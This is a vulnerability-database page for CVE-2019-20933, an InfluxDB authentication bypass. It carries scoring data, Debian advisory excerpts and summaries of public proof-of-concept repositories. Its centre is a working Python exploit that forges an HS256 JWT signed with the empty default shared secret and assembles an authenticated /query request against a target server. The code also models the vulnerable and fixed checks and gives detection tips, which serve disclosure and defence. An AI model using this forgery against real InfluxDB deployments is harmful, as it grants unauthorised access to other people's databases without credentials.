CVSSv3: 9.8

CVE-2019-20933

Published: 19/11/2020 Updated: 19/10/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

InfluxDB prior to 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go: a bearer JWT presented in the Authorization header is verified against the configured SharedSecret (aka shared secret) even when that secret is empty, which is the default. When an administrator enables authentication but never sets `shared-secret` under `[http]`, anyone who can reach the HTTP API (port 8086 by default) can mint an HS256 JWT signed with the empty key, put an existing username (such as admin) in the `username` claim and a future `exp` claim, and be accepted as that user without knowing any password.
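The forgery and the server-side check it abuses, as an added example that is not code from this page, from the PoC repositories listed below, or from InfluxDB itself. It signs the JWT with the standard library only, then models the pre-1.7.6 `authenticate` path (verify against whatever shared secret is configured, even "") next to the fixed behaviour (refuse bearer auth when no shared secret is configured). The function names, the constructed user set and the target URL are assumptions for illustration.

```python
"""CVE-2019-20933: forge an InfluxDB bearer JWT with an empty shared secret.

Hypothetical model of the vulnerable and fixed authenticate() logic; not
InfluxDB source. Only hmac/hashlib are used, no third-party JWT library.
"""
import base64
import hashlib
import hmac
import json
import time
import urllib.parse
import urllib.request
from typing import Optional, Set


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_token(username: str, secret: bytes = b"", ttl: int = 3600) -> str:
    """Build an HS256 JWT with the two claims InfluxDB requires: username and exp.

    With secret=b"" (the default here) this is exactly the CVE-2019-20933 forgery.
    """
    compact = {"separators": (",", ":")}
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    payload = _b64url(json.dumps({"username": username,
                                  "exp": int(time.time()) + ttl}, **compact).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def _verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the HS256 MAC over header.payload matches `secret`
    and the exp claim is still in the future; otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":
            return None
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
            return None
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:  # bad base64 or bad JSON
        return None
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= time.time():
        return None
    return claims


def authenticate_vulnerable(token: str, shared_secret: str, users: Set[str]) -> Optional[str]:
    """Models InfluxDB < 1.7.6: the token is checked against whatever shared
    secret is configured, including the empty default, so an empty-key
    signature verifies and only a valid username is needed."""
    claims = _verify_hs256(token, shared_secret.encode())
    if claims is None or claims.get("username") not in users:
        return None
    return claims["username"]


def authenticate_fixed(token: str, shared_secret: str, users: Set[str]) -> Optional[str]:
    """Models the 1.7.6 fix: bearer auth is refused outright when no shared
    secret is configured, so there is no trivially guessable key."""
    if not shared_secret:
        return None
    return authenticate_vulnerable(token, shared_secret, users)


def build_query_request(base_url: str, token: str, q: str = "SHOW DATABASES") -> urllib.request.Request:
    """Assemble the /query call an exploit would send with the forged token.

    Only builds the request; send it with urllib.request.urlopen(req) against a
    host you are authorised to test. The base_url is an assumption."""
    url = f"{base_url.rstrip('/')}/query?q={urllib.parse.quote(q)}"
    return urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
```

Two practical caveats: the forgery only works when `auth-enabled = true` and `shared-secret` is blank (with auth disabled there is nothing to bypass, and with a real secret the HMAC no longer matches), and the `username` claim must name an existing user, which is why the PoCs below iterate over a wordlist. To check a deployment, inspect `[http] shared-secret` in influxdb.conf and the server version reported in the `X-Influxdb-Version` response header.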



Vulnerable Products

influxdata influxdb
debian debian linux 9.0
debian debian linux 10.0

Vendor Advisories

Debian Bug report logs - #978087 influxdb: CVE-2019-20933 Package: src:influxdb; Maintainer for src:influxdb is Debian Go Packaging Team <team+pkg-go@tracker.debian.org>; Reported by: Salvatore Bonaccorso <carnil@debian.org> Date: Fri, 25 Dec 2020 20:30:01 UTC Severity: grave Tags: security, upstream Found in versio ...
It was discovered that incorrect validation of JWT tokens in InfluxDB, a time series, metrics, and analytics database, could result in authentication bypass. For the stable distribution (buster), this problem has been fixed in version 1.6.4-1+deb10u1. We recommend that you upgrade your influxdb packages. For the detailed security status of influxdb ...

Github Repositories

HackTheBox - Devzat - Writeup Enumeration ⛩\> nmap -p- -sV -sC -v -oA enum --min-rate 4500 --max-rtt-timeout 1500ms --open 101292400 Nmap scan report for 101292400 Host is up (0.16s latency) Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c2:

CVE-2019-20933 InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). Authentication: NONE; access complexity: LOW; access vector: NETWORK; confidentiality/integrity/availability impact: PARTIAL/PARTIAL/PARTIAL. CVSS Score: 7.5. References

CVE-2019-20933 InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret) (see nvd.nist.gov/vuln/detail/CVE-2019-20933 for more details). PoC: this PoC exploits the above CVE to make a quick and dirty InfluxDB client. Usage: usage: infl

InfluxDB Exploit CVE-2019-20933 Exploit for the InfluxDB CVE-2019-20933 vulnerability: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). The exploit checks if the server is vulnerable, then tries to get a remote query shell. It has built in a us

The JSON Web Token Toolkit v2 jwt_tool.py is a toolkit for validating, forging, scanning and tampering JWTs (JSON Web Tokens). Its functionality includes: checking the validity of a token; testing for known exploits: (CVE-2015-2951) the alg=none signature-bypass vulnerability, (CVE-2016-10555) the RS/HS256 public key mismatch vulnerability, (CVE-2018-0114) key injection vul

OSCP Cheat Sheet Commands, Payloads and Resources for the Offensive Security Certified Professional Certification. Resources Basics Tool URL Swaks github.com/jetmore/swaks CyberChef gchq.github.io/CyberChef/ Information Gathering Tool URL Amass github.com/OWASP/Amass AutoRecon github.com/Tib3rius/AutoRecon Sparta gi